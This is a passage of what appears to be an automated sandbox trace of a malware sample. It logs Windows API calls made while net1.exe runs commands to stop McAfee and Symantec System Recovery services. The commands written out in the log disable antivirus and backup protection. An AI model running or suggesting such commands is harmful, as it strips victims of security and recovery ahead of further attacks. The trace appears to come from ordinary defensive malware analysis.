_String2="McAfeeEngineService") returned 7 [0126.028] _wcsicmp (_String1="user", _String2="McAfeeEngineService") returned 8 [0126.028] _wcsicmp (_String1="users", _String2="McAfeeEngineService") returned 8 [0126.028] _wcsicmp (_String1="msg", _String2="McAfeeEngineService") returned 16 [0126.028] _wcsicmp (_String1="messenger", _String2="McAfeeEngineService") returned 2 [0126.028] _wcsicmp (_String1="receiver", _String2="McAfeeEngineService") returned 5 [0126.028] _wcsicmp (_String1="rcv", _String2="McAfeeEngineService") returned 5 [0126.028] _wcsicmp (_String1="netpopup", _String2="McAfeeEngineService") returned 1 [0126.028] _wcsicmp (_String1="redirector", _String2="McAfeeEngineService") returned 5 [0126.028] _wcsicmp (_String1="redir", _String2="McAfeeEngineService") returned 5 [0126.028] _wcsicmp (_String1="rdr", _String2="McAfeeEngineService") returned 5 [0126.028] _wcsicmp (_String1="workstation", _String2="McAfeeEngineService") returned 10 [0126.028] _wcsicmp (_String1="work", _String2="McAfeeEngineService") returned 10 [0126.028] _wcsicmp (_String1="wksta", _String2="McAfeeEngineService") returned 10 [0126.028] _wcsicmp (_String1="prdr", _String2="McAfeeEngineService") returned 3 [0126.028] _wcsicmp (_String1="devrdr", _String2="McAfeeEngineService") returned -9 [0126.028] _wcsicmp (_String1="lanmanworkstation", _String2="McAfeeEngineService") returned -1 [0126.028] _wcsicmp (_String1="server", _String2="McAfeeEngineService") returned 6 [0126.028] _wcsicmp (_String1="svr", _String2="McAfeeEngineService") returned 6 [0126.028] _wcsicmp (_String1="srv", _String2="McAfeeEngineService") returned 6 [0126.028] _wcsicmp (_String1="lanmanserver", _String2="McAfeeEngineService") returned -1 [0126.028] _wcsicmp (_String1="alerter", _String2="McAfeeEngineService") returned -12 [0126.028] _wcsicmp (_String1="netlogon", _String2="McAfeeEngineService") returned 1 [0126.029] _wcsupr (in: _String="McAfeeEngineService" | out: _String="MCAFEEENGINESERVICE") returned="MCAFEEENGINESERVICE" [0126.029] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3454d0 [0126.598] GetServiceKeyNameW (in: hSCManager=0x3454d0, lpDisplayName="MCAFEEENGINESERVICE", lpServiceName=0xe5aaf0, lpcchBuffer=0x10fc70 | out: lpServiceName="", lpcchBuffer=0x10fc70) returned 0 [0126.599] _wcsicmp (_String1="msg", _String2="MCAFEEENGINESERVICE") returned 16 [0126.599] _wcsicmp (_String1="messenger", _String2="MCAFEEENGINESERVICE") returned 2 [0126.599] _wcsicmp (_String1="receiver", _String2="MCAFEEENGINESERVICE") returned 5 [0126.599] _wcsicmp (_String1="rcv", _String2="MCAFEEENGINESERVICE") returned 5 [0126.599] _wcsicmp (_String1="redirector", _String2="MCAFEEENGINESERVICE") returned 5 [0126.599] _wcsicmp (_String1="redir", _String2="MCAFEEENGINESERVICE") returned 5 [0126.599] _wcsicmp (_String1="rdr", _String2="MCAFEEENGINESERVICE") returned 5 [0126.599] _wcsicmp (_String1="workstation", _String2="MCAFEEENGINESERVICE") returned 10 [0126.599] _wcsicmp (_String1="work", _String2="MCAFEEENGINESERVICE") returned 10 [0126.599] _wcsicmp (_String1="wksta", _String2="MCAFEEENGINESERVICE") returned 10 [0126.599] _wcsicmp (_String1="prdr", _String2="MCAFEEENGINESERVICE") returned 3 [0126.599] _wcsicmp (_String1="devrdr", _String2="MCAFEEENGINESERVICE") returned -9 [0126.599] _wcsicmp (_String1="lanmanworkstation", _String2="MCAFEEENGINESERVICE") returned -1 [0126.599] _wcsicmp (_String1="server", _String2="MCAFEEENGINESERVICE") returned 6 [0126.599] _wcsicmp (_String1="svr", _String2="MCAFEEENGINESERVICE") returned 6 [0126.599] _wcsicmp (_String1="srv", _String2="MCAFEEENGINESERVICE") returned 6 [0126.599] _wcsicmp (_String1="lanmanserver", _String2="MCAFEEENGINESERVICE") returned -1 [0126.599] _wcsicmp (_String1="alerter", _String2="MCAFEEENGINESERVICE") returned -12 [0126.599] _wcsicmp (_String1="netlogon", _String2="MCAFEEENGINESERVICE") returned 1 [0126.599] NetServiceControl (in: servername=0x0, service="MCAFEEENGINESERVICE", opcode=0x0, arg=0x0, bufptr=0x10fc6c | out: bufptr=0x10fc6c) returned 0x889 [0126.601] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0126.601] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0126.601] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0126.603] GetFileType (hFile=0x0) returned 0x0 [0126.603] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x343ef0 [0126.603] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x343ef0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n3", lpUsedDefaultChar=0x0) returned 30 [0126.603] WriteFile (in: hFile=0x0, lpBuffer=0x343ef0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x10fbac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10fbac, lpOverlapped=0x0) returned 0 [0126.603] LocalFree (hMem=0x343ef0) returned 0x0 [0126.603] GetFileType (hFile=0x0) returned 0x0 [0126.603] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x346198 [0126.603] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x346198, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n4", lpUsedDefaultChar=0x0) returned 2 [0126.603] WriteFile (in: hFile=0x0, lpBuffer=0x346198, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x10fbac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10fbac, lpOverlapped=0x0) returned 0 [0126.603] LocalFree (hMem=0x346198) returned 0x0 [0126.603] _ultow (in: _Dest=0x889, _Radix=1113052 | out: _Dest=0x889) returned="2185" [0126.603] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0126.603] GetFileType (hFile=0x0) returned 0x0 [0126.603] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x346198 [0126.603] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x346198, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0126.603] WriteFile (in: hFile=0x0, lpBuffer=0x346198, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x10fbb8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10fbb8, lpOverlapped=0x0) returned 0 [0126.603] LocalFree (hMem=0x346198) returned 0x0 [0126.603] GetFileType (hFile=0x0) returned 0x0 [0126.603] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x346198 [0126.603] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x346198, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n4", lpUsedDefaultChar=0x0) returned 2 [0126.603] WriteFile (in: hFile=0x0, lpBuffer=0x346198, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x10fbb8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x10fbb8, lpOverlapped=0x0) returned 0 [0126.603] LocalFree (hMem=0x346198) returned 0x0 [0126.604] NetApiBufferFree (Buffer=0x341af8) returned 0x0 [0126.604] NetApiBufferFree (Buffer=0x341b10) returned 0x0 [0126.604] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop McAfeeEngineService /y" [0126.604] exit (_Code=2) Process: id = "291" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x617f0000" os_pid = "0xb58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "155" os_parent_pid = "0x103c" cmd_line = "C:\\Windows\\system32\\net1 stop “Symantec System Recovery” /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 715 os_tid = 0xfa4 [0127.191] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2fff14 | out: lpSystemTimeAsFileTime=0x2fff14*(dwLowDateTime=0x1f8d3010, dwHighDateTime=0x1d6f0d1)) [0127.191] GetCurrentProcessId () returned 0xb58 [0127.191] GetCurrentThreadId () returned 0xfa4 [0127.191] GetTickCount () returned 0x1153083 [0127.191] QueryPerformanceCounter (in: lpPerformanceCount=0x2fff0c | out: lpPerformanceCount=0x2fff0c*=24629324659) returned 1 [0127.193] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0127.193] __set_app_type (_Type=0x1) [0127.193] __p__fmode () returned 0x770331f4 [0127.193] __p__commode () returned 0x770331fc [0127.193] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0127.193] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0127.193] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.193] GetConsoleOutputCP () returned 0x1b5 [0127.193] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0127.194] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.197] sprintf_s (in: _DstBuf=0x2ffecc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0127.197] setlocale (category=0, locale=".437") returned="English_United States.437" [0127.199] GetStdHandle (nStdHandle=0xfffffff5) returned 0x47c [0127.199] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0127.199] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop “Symantec System Recovery” /y" [0127.199] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ffc98, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0127.199] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x90) returned 0x3d4ad8 [0127.199] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0127.227] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ffe9c | out: Buffer=0x2ffe9c*=0x3d1b10) returned 0x0 [0127.227] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ffe9c | out: Buffer=0x2ffe9c*=0x3d1b28) returned 0x0 [0127.227] _fileno (_File=0x77032900) returned -2 [0127.227] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0127.227] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0127.227] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0127.227] _wcsicmp (_String1="config", _String2="stop") returned -16 [0127.227] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0127.227] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0127.227] _wcsicmp (_String1="file", _String2="stop") returned -13 [0127.227] _wcsicmp (_String1="files", _String2="stop") returned -13 [0127.227] _wcsicmp (_String1="group", _String2="stop") returned -12 [0127.227] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0127.227] _wcsicmp (_String1="help", _String2="stop") returned -11 [0127.227] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0127.227] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0127.227] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0127.227] _wcsicmp (_String1="session", _String2="stop") returned -15 [0127.227] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0127.227] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0127.227] _wcsicmp (_String1="share", _String2="stop") returned -12 [0127.227] _wcsicmp (_String1="start", _String2="stop") returned -14 [0127.228] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0127.228] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0127.228] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0127.228] _wcsicmp (_String1="accounts", _String2="“Symantec") returned -8123 [0127.228] _wcsicmp (_String1="computer", _String2="“Symantec") returned -8121 [0127.228] _wcsicmp (_String1="config", _String2="“Symantec") returned -8121 [0127.228] _wcsicmp (_String1="continue", _String2="“Symantec") returned -8121 [0127.228] _wcsicmp (_String1="cont", _String2="“Symantec") returned -8121 [0127.228] _wcsicmp (_String1="file", _String2="“Symantec") returned -8118 [0127.228] _wcsicmp (_String1="files", _String2="“Symantec") returned -8118 [0127.228] _wcsicmp (_String1="group", _String2="“Symantec") returned -8117 [0127.228] _wcsicmp (_String1="groups", _String2="“Symantec") returned -8117 [0127.228] _wcsicmp (_String1="help", _String2="“Symantec") returned -8116 [0127.228] _wcsicmp (_String1="helpmsg", _String2="“Symantec") returned -8116 [0127.228] _wcsicmp (_String1="localgroup", _String2="“Symantec") returned -8112 [0127.228] _wcsicmp (_String1="pause", _String2="“Symantec") returned -8108 [0127.228] _wcsicmp (_String1="session", _String2="“Symantec") returned -8105 [0127.228] _wcsicmp (_String1="sessions", _String2="“Symantec") returned -8105 [0127.228] _wcsicmp (_String1="sess", _String2="“Symantec") returned -8105 [0127.228] _wcsicmp (_String1="share", _String2="“Symantec") returned -8105 [0127.228] _wcsicmp (_String1="start", _String2="“Symantec") returned -8105 [0127.228] _wcsicmp (_String1="stats", _String2="“Symantec") returned -8105 [0127.229] _wcsicmp (_String1="statistics", _String2="“Symantec") returned -8105 [0127.229] _wcsicmp (_String1="stop", _String2="“Symantec") returned -8105 [0127.229] _wcsicmp (_String1="time", _String2="“Symantec") returned -8104 [0127.229] _wcsicmp (_String1="user", _String2="“Symantec") returned -8103 [0127.229] _wcsicmp (_String1="users", _String2="“Symantec") returned -8103 [0127.229] _wcsicmp (_String1="msg", _String2="“Symantec") returned -8111 [0127.229] _wcsicmp (_String1="messenger", _String2="“Symantec") returned -8111 [0127.229] _wcsicmp (_String1="receiver", _String2="“Symantec") returned -8106 [0127.229] _wcsicmp (_String1="rcv", _String2="“Symantec") returned -8106 [0127.229] _wcsicmp (_String1="netpopup", _String2="“Symantec") returned -8110 [0127.229] _wcsicmp (_String1="redirector", _String2="“Symantec") returned -8106 [0127.229] _wcsicmp (_String1="redir", _String2="“Symantec") returned -8106 [0127.229] _wcsicmp (_String1="rdr", _String2="“Symantec") returned -8106 [0127.229] _wcsicmp (_String1="workstation", _String2="“Symantec") returned -8101 [0127.229] _wcsicmp (_String1="work", _String2="“Symantec") returned -8101 [0127.229] _wcsicmp (_String1="wksta", _String2="“Symantec") returned -8101 [0127.229] _wcsicmp (_String1="prdr", _String2="“Symantec") returned -8108 [0127.229] _wcsicmp (_String1="devrdr", _String2="“Symantec") returned -8120 [0127.229] _wcsicmp (_String1="lanmanworkstation", _String2="“Symantec") returned -8112 [0127.229] _wcsicmp (_String1="server", _String2="“Symantec") returned -8105 [0127.229] _wcsicmp (_String1="svr", _String2="“Symantec") returned -8105 [0127.229] _wcsicmp (_String1="srv", _String2="“Symantec") returned -8105 [0127.229] _wcsicmp (_String1="lanmanserver", _String2="“Symantec") returned -8112 [0127.229] _wcsicmp (_String1="alerter", _String2="“Symantec") returned -8123 [0127.229] _wcsicmp (_String1="netlogon", _String2="“Symantec") returned -8110 [0127.229] _wcsicmp (_String1="accounts", _String2="System") returned -18 [0127.229] _wcsicmp (_String1="computer", _String2="System") returned -16 [0127.229] _wcsicmp (_String1="config", _String2="System") returned -16 [0127.229] _wcsicmp (_String1="continue", _String2="System") returned -16 [0127.230] _wcsicmp (_String1="cont", _String2="System") returned -16 [0127.230] _wcsicmp (_String1="file", _String2="System") returned -13 [0127.230] _wcsicmp (_String1="files", _String2="System") returned -13 [0127.230] _wcsicmp (_String1="group", _String2="System") returned -12 [0127.230] _wcsicmp (_String1="groups", _String2="System") returned -12 [0127.230] _wcsicmp (_String1="help", _String2="System") returned -11 [0127.230] _wcsicmp (_String1="helpmsg", _String2="System") returned -11 [0127.230] _wcsicmp (_String1="localgroup", _String2="System") returned -7 [0127.230] _wcsicmp (_String1="pause", _String2="System") returned -3 [0127.230] _wcsicmp (_String1="session", _String2="System") returned -20 [0127.230] _wcsicmp (_String1="sessions", _String2="System") returned -20 [0127.230] _wcsicmp (_String1="sess", _String2="System") returned -20 [0127.230] _wcsicmp (_String1="share", _String2="System") returned -17 [0127.230] _wcsicmp (_String1="start", _String2="System") returned -5 [0127.230] _wcsicmp (_String1="stats", _String2="System") returned -5 [0127.230] _wcsicmp (_String1="statistics", _String2="System") returned -5 [0127.230] _wcsicmp (_String1="stop", _String2="System") returned -5 [0127.230] _wcsicmp (_String1="time", _String2="System") returned 1 [0127.230] _wcsicmp (_String1="user", _String2="System") returned 2 [0127.230] _wcsicmp (_String1="users", _String2="System") returned 2 [0127.230] _wcsicmp (_String1="msg", _String2="System") returned -6 [0127.230] _wcsicmp (_String1="messenger", _String2="System") returned -6 [0127.230] _wcsicmp (_String1="receiver", _String2="System") returned -1 [0127.230] _wcsicmp (_String1="rcv", _String2="System") returned -1 [0127.230] _wcsicmp (_String1="netpopup", _String2="System") returned -5 [0127.230] _wcsicmp (_String1="redirector", _String2="System") returned -1 [0127.230] _wcsicmp (_String1="redir", _String2="System") returned -1 [0127.230] _wcsicmp (_String1="rdr", _String2="System") returned -1 [0127.230] _wcsicmp (_String1="workstation", _String2="System") returned 4 [0127.230] _wcsicmp (_String1="work", _String2="System") returned 4 [0127.230] _wcsicmp (_String1="wksta", _String2="System") returned 4 [0127.230] _wcsicmp (_String1="prdr", _String2="System") returned -3 [0127.230] _wcsicmp (_String1="devrdr", _String2="System") returned -15 [0127.231] _wcsicmp (_String1="lanmanworkstation", _String2="System") returned -7 [0127.231] _wcsicmp (_String1="server", _String2="System") returned -20 [0127.231] _wcsicmp (_String1="svr", _String2="System") returned -3 [0127.231] _wcsicmp (_String1="srv", _String2="System") returned -7 [0127.231] _wcsicmp (_String1="lanmanserver", _String2="System") returned -7 [0127.231] _wcsicmp (_String1="alerter", _String2="System") returned -18 [0127.231] _wcsicmp (_String1="netlogon", _String2="System") returned -5 [0127.231] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.231] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.232] wcscpy_s (in: _Destination=0x2ff99c, _SizeInWords=0xf, _Source="neth.dll" | out: _Destination="neth.dll") returned 0x0 [0127.232] LoadLibraryW (lpLibFileName="neth.dll") returned 0x70040000 [0127.233] FormatMessageW (in: dwFlags=0x1900, lpSource=0x70040000, dwMessageId=0xc66, dwLanguageId=0x0, lpBuffer=0x2ff998, nSize=0x0, Arguments=0x2ff994 | out: lpBuffer="劸=neth.dll") returned 0xff [0127.234] wcstok (in: _String="CONTINUE: CONT$\r\nFILE: FILES$\r\nGROUP: GROUPS$\r\nREPLICATOR: REPL, REPLICATOR$\r\nSESSION: SESSIONS, SESS$\r\nSTATISTICS: STATS$\r\nUSER: USERS$\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR$\r\nSERVER: SVR, SRV$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="CONTINUE: CONT", _Context=0x3d6) returned="CONTINUE: CONT" [0127.234] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nFILE: FILES" [0127.234] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nGROUP: GROUPS" [0127.234] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nREPLICATOR: REPL, REPLICATOR" [0127.234] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSESSION: SESSIONS, SESS" [0127.234] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSTATISTICS: STATS" [0127.234] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nUSER: USERS" [0127.234] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nWORKSTATION: REDIRECTOR, REDIR, RDR, WORK, WKSTA, PRDR, DEVRDR" [0127.235] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVER: SVR, SRV" [0127.235] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0127.235] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0127.235] wcstok (in: _String="CONTINUE: CONT", _Delimiter=":,$", _Context=0x3d6 | out: _String="CONTINUE", _Context=0x3d6) returned="CONTINUE" [0127.235] wcsspn (_String="CONTINUE", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0127.235] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" CONT" [0127.235] wcsspn (_String=" CONT", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0127.235] _wcsicmp (_String1="CONT", _String2="stop") returned -16 [0127.235] _wcsicmp (_String1="CONT", _String2="“Symantec") returned -8121 [0127.235] _wcsicmp (_String1="CONT", _String2="System") returned -16 [0127.235] _wcsicmp (_String1="CONT", _String2="Recovery”") returned -15 [0127.235] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0127.235] wcstok (in: _String="\r\nFILE: FILES", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nFILE", _Context=0x3d6) returned="\r\nFILE" [0127.235] wcsspn (_String="\r\nFILE", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0127.235] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" FILES" [0127.235] wcsspn (_String=" FILES", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0127.235] _wcsicmp (_String1="FILES", _String2="stop") returned -13 [0127.235] _wcsicmp (_String1="FILES", _String2="“Symantec") returned -8118 [0127.235] _wcsicmp (_String1="FILES", _String2="System") returned -13 [0127.235] _wcsicmp (_String1="FILES", _String2="Recovery”") returned -12 [0127.235] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0127.235] wcstok (in: _String="\r\nGROUP: GROUPS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nGROUP", _Context=0x3d6) returned="\r\nGROUP" [0127.235] wcsspn (_String="\r\nGROUP", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0127.235] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" GROUPS" [0127.235] wcsspn (_String=" GROUPS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0127.235] _wcsicmp (_String1="GROUPS", _String2="stop") returned -12 [0127.235] _wcsicmp (_String1="GROUPS", _String2="“Symantec") returned -8117 [0127.235] _wcsicmp (_String1="GROUPS", _String2="System") returned -12 [0127.235] _wcsicmp (_String1="GROUPS", _String2="Recovery”") returned -11 [0127.235] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0127.235] wcstok (in: _String="\r\nREPLICATOR: REPL, REPLICATOR", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nREPLICATOR", _Context=0x3d6) returned="\r\nREPLICATOR" [0127.235] wcsspn (_String="\r\nREPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0127.235] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPL" [0127.236] wcsspn (_String=" REPL", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0127.236] _wcsicmp (_String1="REPL", _String2="stop") returned -1 [0127.236] _wcsicmp (_String1="REPL", _String2="“Symantec") returned -8106 [0127.236] _wcsicmp (_String1="REPL", _String2="System") returned -1 [0127.236] _wcsicmp (_String1="REPL", _String2="Recovery”") returned 13 [0127.236] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" REPLICATOR" [0127.236] wcsspn (_String=" REPLICATOR", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0127.236] _wcsicmp (_String1="REPLICATOR", _String2="stop") returned -1 [0127.236] _wcsicmp (_String1="REPLICATOR", _String2="“Symantec") returned -8106 [0127.236] _wcsicmp (_String1="REPLICATOR", _String2="System") returned -1 [0127.236] _wcsicmp (_String1="REPLICATOR", _String2="Recovery”") returned 13 [0127.236] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0127.236] wcstok (in: _String="\r\nSESSION: SESSIONS, SESS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSESSION", _Context=0x3d6) returned="\r\nSESSION" [0127.236] wcsspn (_String="\r\nSESSION", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0127.236] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESSIONS" [0127.236] wcsspn (_String=" SESSIONS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0127.236] _wcsicmp (_String1="SESSIONS", _String2="stop") returned -15 [0127.236] _wcsicmp (_String1="SESSIONS", _String2="“Symantec") returned -8105 [0127.236] _wcsicmp (_String1="SESSIONS", _String2="System") returned -20 [0127.236] _wcsicmp (_String1="SESSIONS", _String2="Recovery”") returned 1 [0127.236] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SESS" [0127.236] wcsspn (_String=" SESS", _Control="\x09\n\x0b\x0c\r ") returned 0x1 [0127.236] _wcsicmp (_String1="SESS", _String2="stop") returned -15 [0127.236] _wcsicmp (_String1="SESS", _String2="“Symantec") returned -8105 [0127.236] _wcsicmp (_String1="SESS", _String2="System") returned -20 [0127.236] _wcsicmp (_String1="SESS", _String2="Recovery”") returned 1 [0127.236] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0127.236] wcstok (in: _String="\r\nSTATISTICS: STATS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nSTATISTICS", _Context=0x3d6) returned="\r\nSTATISTICS" [0127.236] wcsspn (_String="\r\nSTATISTICS", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0127.236] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" STATS" [0127.236] wcsspn (_String=" STATS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0127.236] _wcsicmp (_String1="STATS", _String2="stop") returned -14 [0127.237] _wcsicmp (_String1="STATS", _String2="“Symantec") returned -8105 [0127.237] _wcsicmp (_String1="STATS", _String2="System") returned -5 [0127.237] _wcsicmp (_String1="STATS", _String2="Recovery”") returned 1 [0127.237] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0127.237] wcstok (in: _String="\r\nUSER: USERS", _Delimiter=":,$", _Context=0x3d6 | out: _String="\r\nUSER", _Context=0x3d6) returned="\r\nUSER" [0127.237] wcsspn (_String="\r\nUSER", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0127.237] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" USERS" [0127.237] wcsspn (_String=" USERS", _Control="\x09\n\x0b\x0c\r ") returned 0x5 [0127.237] _wcsicmp (_String1="USERS", _String2="stop") returned 2 [0127.237] _wcsicmp (_String1="USERS", _String2="“Symantec") returned -8103 [0127.237] 